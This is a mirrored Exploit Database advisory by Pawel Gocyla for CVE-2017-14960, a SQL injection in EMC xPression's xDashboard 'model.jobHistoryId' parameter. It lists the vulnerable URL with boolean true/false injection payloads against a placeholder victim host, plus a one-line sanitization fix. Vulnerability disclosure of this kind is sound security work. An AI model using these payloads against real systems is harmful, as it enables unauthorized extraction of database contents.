EMC xPression 4.5SP1 Patch 13 – ‘model.jobHistoryId’ SQL Injection

• Exploit Database
• 126 阅读

• 作者： Pawel Gocyla
  日期： 2018-01-03
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/43422/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42

  Title: EMC xDashboard - SQL Injection Vulnerability Author: Pawel Gocyla Date: 02 January 2018   CVE: CVE-2017-14960     Affected Software: ================== EMC xPression v4.5SP1 Patch 13 Probably other versions are also vulnerable.     SQL Injection Vulnerability: ============================== This vulnerability allows an attacker to retrieve information from the database   Vulnerable parameter: "$model.jobHistoryId"   Exploit:   True Condition:https://[victim]:4000/xDashboard/html/jobhistory/ jobDocHistoryList.action?model.jobHistoryId=1736687378927012979202234841133 and 1=1 False Condition: https://[victim]:4000/xDashboard/html/jobhistory/ jobDocHistoryList.action?model.jobHistoryId=1736687378927012979202234841133 and 1=2   Fix: ==== User input which is putted into sql queries should be properly filtred or sanitized   References: ============ https://www.owasp.org/index.php/SQL_Injection   Contact: ======== pawellgocyla[at]gmail[dot]com